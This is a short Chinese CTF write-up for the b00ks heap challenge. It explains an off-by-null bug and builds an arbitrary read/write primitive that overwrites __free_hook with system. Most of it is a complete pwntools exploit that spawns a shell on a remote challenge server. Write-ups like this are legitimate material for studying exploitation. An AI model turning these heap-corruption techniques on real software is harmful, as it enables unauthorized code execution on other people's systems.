buu刷题日记 asis2016_b00ks

1.漏洞点

一个off by null，但和其他堆题的利用不太一样。

输入name时可覆盖heaplist的最低位为0

2.利用思路

1.泄露heap地址

申请大的heap再free掉，show功能正常，直接泄露。

2.泄露libc && 改__free_hook

heaplist的第一个指针最低位可覆盖为0，在对应位置伪造结构体，再结合edit和show功能实现任意读写,改freehook为system。

3.shell

申请时写入‘/bin/sh\x00’再free掉。

3.exp

from pwn import *
p=remote('node3.buuoj.cn',26380)
#p = process('./b00ks')
#p = process(['./b00ks'],env={"LD_PRELOAD":"./libc-2.23.so"})
elf = ELF('./b00ks')
libc = ELF('/home/root2/Desktop/buu_64/libc-2.23.so')
#libc = ELF('./libc-2.23.so')
context.log_level = 'debug'

def duan():
    gdb.attach(p)
    pause()
def add(name_size,name,content_size,content):
    p.sendlineafter('> ','1')
    p.sendlineafter('size: ',str(name_size))
    p.sendlineafter('chars): ',name)
    p.sendlineafter('size: ',str(content_size))
    p.sendlineafter('tion: ',content)
def delete(index):
    p.sendlineafter('> ','2')
    p.sendlineafter('delete: ',str(index))
def edit(index,content):
    p.sendlineafter('> ','3')
    p.sendlineafter('edit: ',str(index))
    p.sendlineafter('ption: ',content)
def show():
    p.sendlineafter('> ','4')
def change(author_name):
    p.sendlineafter('> ','5')
    p.sendlineafter('name: ',author_name)

p.sendlineafter('name: ','a'*0x1f+'b')
add(0xd0,'aaaaaaaa',0x20,'bbbbbbbb')
show()
p.recvuntil('aaab')
heap_addr = u64(p.recv(6).ljust(8,'\x00'))
print 'heap_addr-->'+hex(heap_addr)
add(0x80,'cccccccc',0x60,'dddddddd')
add(0x10,'eeeeeeee',0x10,'ffffffff')
delete(2)
edit(1,p64(1)+p64(heap_addr+0x30)+p64(heap_addr+0x30+0x90+0xe0+0x10)+p64(0x20))
change('a'*0x20)
show()
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-0x10-libc.symbols['__malloc_hook']
__malloc_hook = libc_base+libc.symbols['__malloc_hook']
success('libc_base:'+hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
realloc = libc_base+libc.symbols['realloc']
system=libc_base+libc.sym['system']
edit(1,p64(free_hook)+p64(0x8))
edit(3,p64(system))
add(0x100,'/bin/sh\x00',0x100,'/bin/sh\x00')
#gdb.attach(p)
delete(4)

p.interactive()